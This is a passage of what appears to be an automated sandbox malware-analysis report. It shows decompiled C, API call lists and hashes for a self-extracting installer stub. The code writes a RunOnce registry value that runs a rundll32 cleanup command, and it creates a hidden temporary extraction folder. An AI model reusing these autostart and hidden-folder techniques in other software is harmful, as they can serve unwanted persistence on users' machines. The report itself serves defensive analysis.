                                                          Similarity
                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                          • String ID:
                                                          • API String ID: 836429354-0
                                                          • Opcode ID: bac33497a8490eec3fe3d9d1a12a5f9e4bab8c5e095bc1628fa47a3797f63709
                                                          • Instruction ID: b0c107ac703fb167a0af4101c0974160ab6aa755077f5eea07d9be330e21a2af
                                                          • Opcode Fuzzy Hash: bac33497a8490eec3fe3d9d1a12a5f9e4bab8c5e095bc1628fa47a3797f63709
                                                          • Instruction Fuzzy Hash: 88316031604645DFD330EBA4CC88AEFB7E8ABC8B45F14492DA9D587280EF7995098F52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 70%
                                                          			E010C2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				long _t4;
                                                          				void* _t6;
                                                          				intOrPtr _t7;
                                                          				void* _t9;
                                                          				struct HINSTANCE__* _t12;
                                                          				intOrPtr* _t17;
                                                          				signed char _t19;
                                                          				intOrPtr* _t21;
                                                          				void* _t22;
                                                          				void* _t24;
                                                          				intOrPtr _t32;
                                                          
                                                          				_t4 = GetVersion();
                                                          				if(_t4 >= 0 && _t4 >= 6) {
                                                          					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                          					if(_t12 != 0) {
                                                          						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                          						if(_t21 != 0) {
                                                          							_t17 = _t21;
                                                          							 *0x10ca288(0, 1, 0, 0);
                                                          							 *_t21();
                                                          							_t29 = _t24 - _t24;
                                                          							if(_t24 != _t24) {
                                                          								_t17 = 4;
                                                          								asm("int 0x29");
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t20 = _a12;
                                                          				_t18 = _a4;
                                                          				 *0x10c9124 = 0;
                                                          				if(E010C2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                          					_t9 = E010C2F1D(_t18, _t20); // executed
                                                          					_t22 = _t9; // executed
                                                          					E010C52B6(0, _t18, _t21, _t22); // executed
                                                          					if(_t22 != 0) {
                                                          						_t32 =  *0x10c8a3a; // 0x0
                                                          						if(_t32 == 0) {
                                                          							_t19 =  *0x10c9a2c; // 0x0
                                                          							if((_t19 & 0x00000001) != 0) {
                                                          								E010C1F90(_t19, _t21, _t22);
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t6 =  *0x10c8588; // 0x0
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x10c9124; // 0x0
                                                          				return _t7;
                                                          			}


















                                                          0x010c2c03
                                                          0x010c2c0d
                                                          0x010c2c18
                                                          0x010c2c20
                                                          0x010c2c2e
                                                          0x010c2c32
                                                          0x010c2c36
                                                          0x010c2c3d
                                                          0x010c2c43
                                                          0x010c2c45
                                                          0x010c2c47
                                                          0x010c2c49
                                                          0x010c2c4e
                                                          0x010c2c4e
                                                          0x010c2c47
                                                          0x010c2c32
                                                          0x010c2c20
                                                          0x010c2c50
                                                          0x010c2c54
                                                          0x010c2c57
                                                          0x010c2c64
                                                          0x010c2c66
                                                          0x010c2c6b
                                                          0x010c2c6d
                                                          0x010c2c74
                                                          0x010c2c76
                                                          0x010c2c7c
                                                          0x010c2c7e
                                                          0x010c2c87
                                                          0x010c2c89
                                                          0x010c2c89
                                                          0x010c2c87
                                                          0x010c2c7c
                                                          0x010c2c74
                                                          0x010c2c8e
                                                          0x010c2c95
                                                          0x010c2c98
                                                          0x010c2c98
                                                          0x010c2c9e
                                                          0x010c2ca7

                                                          APIs
                                                          • GetVersion.KERNEL32(?,00000002,00000000,?,010C6BB0,010C0000,00000000,00000002,0000000A), ref: 010C2C03
                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010C6BB0,010C0000,00000000,00000002,0000000A), ref: 010C2C18
                                                          • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010C2C28
                                                          • CloseHandle.KERNEL32(00000000,?,?,010C6BB0,010C0000,00000000,00000002,0000000A), ref: 010C2C98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Handle$AddressCloseModuleProcVersion
                                                          • String ID: HeapSetInformation$Kernel32.dll
                                                          • API String ID: 62482547-3460614246
                                                          • Opcode ID: 3e15d389af2a74bb8c4f680a035136833ff210e1d15825242967402a24fae714
                                                          • Instruction ID: 924aecbdd5bcd843a263fb04cff925d6a57923b1e2d6d86e556bb19aafaa00c2
                                                          • Opcode Fuzzy Hash: 3e15d389af2a74bb8c4f680a035136833ff210e1d15825242967402a24fae714
                                                          • Instruction Fuzzy Hash: A7118A7130020D9FE7306BF998C8A6F3B999B84F94B04406DFAC5D7685DA3AD8419F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C6F40() {
                                                          
                                                          				SetUnhandledExceptionFilter(E010C6EF0); // executed
                                                          				return 0;
                                                          			}



                                                          0x010c6f45
                                                          0x010c6f4d

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010C6F45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 955f56049bbe72be1d4ea36d49e9b074ed2d3e7a35b0cd8cbe3fe5745dc53214
                                                          • Instruction ID: e50ee1b9549d8d404b405a09bc8a2403e5b56de104fedff3cd5fcf5ff72831f7
                                                          • Opcode Fuzzy Hash: 955f56049bbe72be1d4ea36d49e9b074ed2d3e7a35b0cd8cbe3fe5745dc53214
                                                          • Instruction Fuzzy Hash: AC9002703511048B97301BB1991941975915A8DA427825469A491C9548EB6640405E12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 93%
                                                          			E010C202A(struct HINSTANCE__* __edx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v528;
                                                          				void* _v532;
                                                          				int _v536;
                                                          				int _v540;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				long _t36;
                                                          				long _t41;
                                                          				struct HINSTANCE__* _t46;
                                                          				intOrPtr _t49;
                                                          				intOrPtr _t50;
                                                          				CHAR* _t54;
                                                          				void _t56;
                                                          				signed int _t66;
                                                          				intOrPtr* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t80;
                                                          				intOrPtr* _t81;
                                                          				void* _t86;
                                                          				void* _t87;
                                                          				void* _t90;
                                                          				_Unknown_base(*)()* _t91;
                                                          				signed int _t93;
                                                          				void* _t94;
                                                          				void* _t95;
                                                          
                                                          				_t79 = __edx;
                                                          				_t28 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t28 ^ _t93;
                                                          				_t84 = 0x104;
                                                          				memset( &_v268, 0, 0x104);
                                                          				memset( &_v528, 0, 0x104);
                                                          				_t95 = _t94 + 0x18;
                                                          				_t66 = 0;
                                                          				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                          				if(_t36 != 0) {
                                                          					L24:
                                                          					return E010C6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                          				}
                                                          				_push(_t86);
                                                          				_t87 = 0;
                                                          				while(1) {
                                                          					E010C171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                          					_t95 = _t95 + 0x10;
                                                          					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                          					if(_t41 != 0) {
                                                          						break;
                                                          					}
                                                          					_t87 = _t87 + 1;
                                                          					if(_t87 < 0xc8) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				if(_t87 != 0xc8) {
                                                          					GetSystemDirectoryA( &_v528, _t84);
                                                          					_t79 = _t84;
                                                          					E010C658A( &_v528, _t84, "advpack.dll");
                                                          					_t46 = LoadLibraryA( &_v528); // executed
                                                          					_t84 = _t46;
                                                          					if(_t84 == 0) {
                                                          						L10:
                                                          						if(GetModuleFileNameA( *0x10c9a3c,  &_v268, 0x104) == 0) {
                                                          							L17:
                                                          							_t36 = RegCloseKey(_v532);
                                                          							L23:
                                                          							_pop(_t86);
                                                          							goto L24;
                                                          						}
                                                          						L11:
                                                          						_t72 =  &_v268;
                                                          						_t80 = _t72 + 1;
                                                          						do {
                                                          							_t49 =  *_t72;
                                                          							_t72 = _t72 + 1;
                                                          						} while (_t49 != 0);
                                                          						_t73 = _t72 - _t80;
                                                          						_t81 = 0x10c91e4;
                                                          						do {
                                                          							_t50 =  *_t81;
                                                          							_t81 = _t81 + 1;
                                                          						} while (_t50 != 0);
                                                          						_t84 = _t73 + 0x50 + _t81 - 0x10c91e5;
                                                          						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10c91e5);
                                                          						if(_t90 != 0) {
                                                          							 *0x10c8580 = _t66 ^ 0x00000001;
                                                          							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                          							if(_t66 == 0) {
                                                          								_t54 = "%s /D:%s";
                                                          							}
                                                          							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          							E010C171E(_t90, _t84, _t54,  &_v268);
                                                          							_t75 = _t90;
                                                          							_t23 = _t75 + 1; // 0x1
                                                          							_t79 = _t23;
                                                          							do {
                                                          								_t56 =  *_t75;
                                                          								_t75 = _t75 + 1;
                                                          							} while (_t56 != 0);
                                                          							_t24 = _t75 - _t79 + 1; // 0x2
                                                          							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                          							RegCloseKey(_v532); // executed
                                                          							_t36 = LocalFree(_t90);
                                                          							goto L23;
                                                          						}
                                                          						_t79 = 0x4b5;
                                                          						E010C44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                          						goto L17;
                                                          					}
                                                          					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                          					_t66 = 0 | _t91 != 0x00000000;
                                                          					FreeLibrary(_t84); // executed
                                                          					if(_t91 == 0) {
                                                          						goto L10;
                                                          					}
                                                          					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                          						E010C658A( &_v268, 0x104, 0x10c1140);
                                                          					}
                                                          					goto L11;
                                                          				}
                                                          				_t36 = RegCloseKey(_v532);
                                                          				 *0x10c8530 = _t66;
                                                          				goto L23;
                                                          			}

































                                                          0x010c202a
                                                          0x010c2035
                                                          0x010c203c
                                                          0x010c2041
                                                          0x010c2050
                                                          0x010c205f
                                                          0x010c2064
                                                          0x010c206f
                                                          0x010c208c
                                                          0x010c2094
                                                          0x010c2257
                                                          0x010c2266
                                                          0x010c2266
                                                          0x010c209a
                                                          0x010c209b
                                                          0x010c209d
                                                          0x010c20aa
                                                          0x010c20af
                                                          0x010c20c9
                                                          0x010c20d1
                                                          0x00000000
                                                          0x00000000
                                                          0x010c20d3
                                                          0x010c20da
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c20da
                                                          0x010c20e2
                                                          0x010c2103
                                                          0x010c210e
                                                          0x010c2116
                                                          0x010c2122
                                                          0x010c2128
                                                          0x010c212c
                                                          0x010c2179
                                                          0x010c2194
                                                          0x010c21de
                                                          0x010c21e4
                                                          0x010c2256
                                                          0x010c2256
                                                          0x00000000
                                                          0x010c2256
                                                          0x010c2196
                                                          0x010c2196
                                                          0x010c219c
                                                          0x010c219f
                                                          0x010c219f
                                                          0x010c21a1
                                                          0x010c21a2
                                                          0x010c21a6
                                                          0x010c21a8
                                                          0x010c21b0
                                                          0x010c21b0
                                                          0x010c21b2
                                                          0x010c21b3
                                                          0x010c21bc
                                                          0x010c21c7
                                                          0x010c21cb
                                                          0x010c21f1
                                                          0x010c21f6
                                                          0x010c21fd
                                                          0x010c21ff
                                                          0x010c21ff
                                                          0x010c2204
                                                          0x010c2213
                                                          0x010c2218
                                                          0x010c221d
                                                          0x010c221d
                                                          0x010c2220
                                                          0x010c2220
                                                          0x010c2222
                                                          0x010c2223
                                                          0x010c2229
                                                          0x010c223d
                                                          0x010c2249
                                                          0x010c2250
                                                          0x00000000
                                                          0x010c2250
                                                          0x010c21d2
                                                          0x010c21d9
                                                          0x00000000
                                                          0x010c21d9
                                                          0x010c213a
                                                          0x010c2141
                                                          0x010c2144
                                                          0x010c214c
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2163
                                                          0x010c2172
                                                          0x010c2172
                                                          0x00000000
                                                          0x010c2163
                                                          0x010c20ea
                                                          0x010c20f0
                                                          0x00000000

                                                          APIs
                                                          • memset.MSVCRT ref: 010C2050
                                                          • memset.MSVCRT ref: 010C205F
                                                          • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010C208C
                                                            • Part of subcall function 010C171E: _vsnprintf.MSVCRT ref: 010C1750
                                                          • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C20C9
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C20EA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C2103
                                                          • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C2122
                                                          • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010C2134
                                                          • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C2144
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C215B
                                                          • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C218C
                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C21C1
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C21E4
                                                          • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010C223D
                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C2249
                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C2250
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                          • API String ID: 178549006-1709460465
                                                          • Opcode ID: 6e06338b3a4bccd12718eef862f43889bc38359744a9c494531049e605f331c0
                                                          • Instruction ID: 5e096f3e883f4803353cffa39cfeb05f9d91d828cb1a9a4c81fa27ee135cd5aa
                                                          • Opcode Fuzzy Hash: 6e06338b3a4bccd12718eef862f43889bc38359744a9c494531049e605f331c0
                                                          • Instruction Fuzzy Hash: AA511375A00218AFDB309B24DC48FEE7B6CEB90B40F1041ADBEC9E7145EA7699448F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 232 10c55a0-10c55d9 call 10c468f LocalAlloc 235 10c55fd-10c560c call 10c468f 232->235 236 10c55db-10c55f1 call 10c44b9 call 10c6285 232->236 242 10c560e-10c5630 call 10c44b9 LocalFree 235->242 243 10c5632-10c5643 lstrcmpA 235->243 251 10c55f6-10c55f8 236->251 242->251 245 10c564b-10c5659 LocalFree 243->245 246 10c5645 243->246 249 10c565b-10c565d 245->249 250 10c5696-10c569c 245->250 246->245 252 10c565f-10c5667 249->252 253 10c5669 249->253 255 10c589f-10c58b5 call 10c6517 250->255 256 10c56a2-10c56a8 250->256 254 10c58b7-10c58c7 call 10c6ce0 251->254 252->253 258 10c566b-10c567a call 10c5467 252->258 253->258 255->254 256->255 257 10c56ae-10c56c1 GetTempPathA 256->257 261 10c56f3-10c5711 call 10c1781 257->261 262 10c56c3-10c56c9 call 10c5467 257->262 270 10c589b-10c589d 258->270 271 10c5680-10c5691 call 10c44b9 258->271 275 10c586c-10c5890 GetWindowsDirectoryA call 10c597d 261->275 276 10c5717-10c5729 GetDriveTypeA 261->276 269 10c56ce-10c56d0 262->269 269->270 273 10c56d6-10c56df call 10c2630 269->273 270->254 271->251 273->261 288 10c56e1-10c56ed call 10c5467 273->288 275->261 289 10c5896 275->289 280 10c572b-10c572e 276->280 281 10c5730-10c5740 GetFileAttributesA 276->281 280->281 283 10c5742-10c5745 280->283 282 10c577e-10c578f call 10c597d 281->282 281->283 298 10c5791-10c579e call 10c2630 282->298 299 10c57b2-10c57bf call 10c2630 282->299 286 10c576b 283->286 287 10c5747-10c574f 283->287 291 10c5771-10c5779 286->291 287->291 292 10c5751-10c5753 287->292 288->261 288->270 289->270 296 10c5864-10c5866 291->296 292->291 295 10c5755-10c5762 call 10c6952 292->295 295->286 308 10c5764-10c5769 295->308 296->275 296->276 298->286 309 10c57a0-10c57b0 call 10c597d 298->309 306 10c57c1-10c57cd GetWindowsDirectoryA 299->306 307 10c57d3-10c57f8 call 10c658a GetFileAttributesA 299->307 306->307 314 10c580a 307->314 315 10c57fa-10c5808 CreateDirectoryA 307->315 308->282 308->286 309->286 309->299 316 10c580d-10c580f 314->316 315->316 317 10c5827-10c585c SetFileAttributesA call 10c1781 call 10c5467 316->317 318 10c5811-10c5825 316->318 317->270 323 10c585e 317->323 318->296 323->296
                                                          C-Code - Quality: 92%
                                                          			E010C55A0(void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v265;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				int _t32;
                                                          				int _t33;
                                                          				int _t35;
                                                          				signed int _t36;
                                                          				signed int _t38;
                                                          				int _t40;
                                                          				int _t44;
                                                          				long _t48;
                                                          				int _t49;
                                                          				int _t50;
                                                          				signed int _t53;
                                                          				int _t54;
                                                          				int _t59;
                                                          				char _t60;
                                                          				int _t65;
                                                          				char _t66;
                                                          				int _t67;
                                                          				int _t68;
                                                          				int _t69;
                                                          				int _t70;
                                                          				int _t71;
                                                          				struct _SECURITY_ATTRIBUTES* _t72;
                                                          				int _t73;
                                                          				CHAR* _t82;
                                                          				CHAR* _t88;
                                                          				void* _t103;
                                                          				signed int _t110;
                                                          
                                                          				_t28 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t28 ^ _t110;
                                                          				_t2 = E010C468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                          				_t109 = LocalAlloc(0x40, _t2);
                                                          				if(_t109 != 0) {
                                                          					_t82 = "RUNPROGRAM";
                                                          					_t32 = E010C468F(_t82, _t109, 1);
                                                          					__eflags = _t32;
                                                          					if(_t32 != 0) {
                                                          						_t33 = lstrcmpA(_t109, "<None>");
                                                          						__eflags = _t33;
                                                          						if(_t33 == 0) {
                                                          							 *0x10c9a30 = 1;
                                                          						}
                                                          						LocalFree(_t109);
                                                          						_t35 =  *0x10c8b3e; // 0x0
                                                          						__eflags = _t35;
                                                          						if(_t35 == 0) {
                                                          							__eflags =  *0x10c8a24; // 0x0
                                                          							if(__eflags != 0) {
                                                          								L46:
                                                          								_t101 = 0x7d2;
                                                          								_t36 = E010C6517(_t82, 0x7d2, 0, E010C3210, 0, 0);
                                                          								asm("sbb eax, eax");
                                                          								_t38 =  ~( ~_t36);
                                                          							} else {
                                                          								__eflags =  *0x10c9a30; // 0x0
                                                          								if(__eflags != 0) {
                                                          									goto L46;
                                                          								} else {
                                                          									_t109 = 0x10c91e4;
                                                          									_t40 = GetTempPathA(0x104, 0x10c91e4);
                                                          									__eflags = _t40;
                                                          									if(_t40 == 0) {
                                                          										L19:
                                                          										_push(_t82);
                                                          										E010C1781( &_v268, 0x104, _t82, "A:\\");
                                                          										__eflags = _v268 - 0x5a;
                                                          										if(_v268 <= 0x5a) {
                                                          											do {
                                                          												_t109 = GetDriveTypeA( &_v268);
                                                          												__eflags = _t109 - 6;
                                                          												if(_t109 == 6) {
                                                          													L22:
                                                          													_t48 = GetFileAttributesA( &_v268);
                                                          													__eflags = _t48 - 0xffffffff;
                                                          													if(_t48 != 0xffffffff) {
                                                          														goto L30;
                                                          													} else {
                                                          														goto L23;
                                                          													}
                                                          												} else {
                                                          													__eflags = _t109 - 3;
                                                          													if(_t109 != 3) {
                                                          														L23:
                                                          														__eflags = _t109 - 2;
                                                          														if(_t109 != 2) {
                                                          															L28:
                                                          															_t66 = _v268;
                                                          															goto L29;
                                                          														} else {
                                                          															_t66 = _v268;
                                                          															__eflags = _t66 - 0x41;
                                                          															if(_t66 == 0x41) {
                                                          																L29:
                                                          																_t60 = _t66 + 1;
                                                          																_v268 = _t60;
                                                          																goto L42;
                                                          															} else {
                                                          																__eflags = _t66 - 0x42;
                                                          																if(_t66 == 0x42) {
                                                          																	goto L29;
                                                          																} else {
                                                          																	_t68 = E010C6952( &_v268);
                                                          																	__eflags = _t68;
                                                          																	if(_t68 == 0) {
                                                          																		goto L28;
                                                          																	} else {
                                                          																		__eflags = _t68 - 0x19000;
                                                          																		if(_t68 >= 0x19000) {
                                                          																			L30:
                                                          																			_push(0);
                                                          																			_t103 = 3;
                                                          																			_t49 = E010C597D( &_v268, _t103, 1);
                                                          																			__eflags = _t49;
                                                          																			if(_t49 != 0) {
                                                          																				L33:
                                                          																				_t50 = E010C2630(0,  &_v268, 1);
                                                          																				__eflags = _t50;
                                                          																				if(_t50 != 0) {
                                                          																					GetWindowsDirectoryA( &_v268, 0x104);
                                                          																				}
                                                          																				_t88 =  &_v268;
                                                          																				E010C658A(_t88, 0x104, "msdownld.tmp");
                                                          																				_t53 = GetFileAttributesA( &_v268);
                                                          																				__eflags = _t53 - 0xffffffff;
                                                          																				if(_t53 != 0xffffffff) {
                                                          																					_t54 = _t53 & 0x00000010;
                                                          																					__eflags = _t54;
                                                          																				} else {
                                                          																					_t54 = CreateDirectoryA( &_v268, 0);
                                                          																				}
                                                          																				__eflags = _t54;
                                                          																				if(_t54 != 0) {
                                                          																					SetFileAttributesA( &_v268, 2);
                                                          																					_push(_t88);
                                                          																					_t109 = 0x10c91e4;
                                                          																					E010C1781(0x10c91e4, 0x104, _t88,  &_v268);
                                                          																					_t101 = 1;
                                                          																					_t59 = E010C5467(0x10c91e4, 1, 0);
                                                          																					__eflags = _t59;
                                                          																					if(_t59 != 0) {
                                                          																						goto L45;
                                                          																					} else {
                                                          																						_t60 = _v268;
                                                          																						goto L42;
                                                          																					}
                                                          																				} else {
                                                          																					_t60 = _v268 + 1;
                                                          																					_v265 = 0;
                                                          																					_v268 = _t60;
                                                          																					goto L42;
                                                          																				}
                                                          																			} else {
                                                          																				_t65 = E010C2630(0,  &_v268, 1);
                                                          																				__eflags = _t65;
                                                          																				if(_t65 != 0) {
                                                          																					goto L28;
                                                          																				} else {
                                                          																					_t67 = E010C597D( &_v268, 1, 1, 0);
                                                          																					__eflags = _t67;
                                                          																					if(_t67 == 0) {
                                                          																						goto L28;
                                                          																					} else {
                                                          																						goto L33;
                                                          																					}
                                                          																				}
                                                          																			}
                                                          																		} else {
                                                          																			goto L28;
                                                          																		}
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													} else {
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          												goto L47;
                                                          												L42:
                                                          												__eflags = _t60 - 0x5a;
                                                          											} while (_t60 <= 0x5a);
                                                          										}
                                                          										goto L43;
                                                          									} else {
                                                          										_t101 = 1;
                                                          										_t69 = E010C5467(0x10c91e4, 1, 3); // executed
                                                          										__eflags = _t69;
                                                          										if(_t69 != 0) {
                                                          											goto L45;
                                                          										} else {
                                                          											_t82 = 0x10c91e4;
                                                          											_t70 = E010C2630(0, 0x10c91e4, 1);
                                                          											__eflags = _t70;
                                                          											if(_t70 != 0) {
                                                          												goto L19;
                                                          											} else {
                                                          												_t101 = 1;
                                                          												_t82 = 0x10c91e4;
                                                          												_t71 = E010C5467(0x10c91e4, 1, 1);
                                                          												__eflags = _t71;
                                                          												if(_t71 != 0) {
                                                          													goto L45;
                                                          												} else {
                                                          													do {
                                                          														goto L19;
                                                          														L43:
                                                          														GetWindowsDirectoryA( &_v268, 0x104);
                                                          														_push(4);
                                                          														_t101 = 3;
                                                          														_t82 =  &_v268;
                                                          														_t44 = E010C597D(_t82, _t101, 1);
                                                          														__eflags = _t44;
                                                          													} while (_t44 != 0);
                                                          													goto L2;
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							__eflags = _t35 - 0x5c;
                                                          							if(_t35 != 0x5c) {
                                                          								L10:
                                                          								_t72 = 1;
                                                          							} else {
                                                          								__eflags =  *0x10c8b3f - _t35; // 0x0
                                                          								_t72 = 0;
                                                          								if(__eflags != 0) {
                                                          									goto L10;
                                                          								}
                                                          							}
                                                          							_t101 = 0;
                                                          							_t73 = E010C5467(0x10c8b3e, 0, _t72);
                                                          							__eflags = _t73;
                                                          							if(_t73 != 0) {
                                                          								L45:
                                                          								_t38 = 1;
                                                          							} else {
                                                          								_t101 = 0x4be;
                                                          								E010C44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                          								goto L2;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t101 = 0x4b1;
                                                          						E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          						LocalFree(_t109);
                                                          						 *0x10c9124 = 0x80070714;
                                                          						goto L2;
                                                          					}
                                                          				} else {
                                                          					_t101 = 0x4b5;
                                                          					E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          					 *0x10c9124 = E010C6285();
                                                          					L2:
                                                          					_t38 = 0;
                                                          				}
                                                          				L47:
                                                          				return E010C6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                          			}





































                                                          0x010c55ab
                                                          0x010c55b2
                                                          0x010c55c9
                                                          0x010c55d5
                                                          0x010c55d9
                                                          0x010c5600
                                                          0x010c5605
                                                          0x010c560a
                                                          0x010c560c
                                                          0x010c5638
                                                          0x010c5641
                                                          0x010c5643
                                                          0x010c5645
                                                          0x010c5645
                                                          0x010c564c
                                                          0x010c5652
                                                          0x010c5657
                                                          0x010c5659
                                                          0x010c5696
                                                          0x010c569c
                                                          0x010c589f
                                                          0x010c58a7
                                                          0x010c58ac
                                                          0x010c58b3
                                                          0x010c58b5
                                                          0x010c56a2
                                                          0x010c56a2
                                                          0x010c56a8
                                                          0x00000000
                                                          0x010c56ae
                                                          0x010c56ae
                                                          0x010c56b9
                                                          0x010c56bf
                                                          0x010c56c1
                                                          0x010c56f3
                                                          0x010c56f3
                                                          0x010c5705
                                                          0x010c570a
                                                          0x010c5711
                                                          0x010c5717
                                                          0x010c5724
                                                          0x010c5726
                                                          0x010c5729
                                                          0x010c5730
                                                          0x010c5737
                                                          0x010c573d
                                                          0x010c5740
                                                          0x00000000
                                                          0x00000000
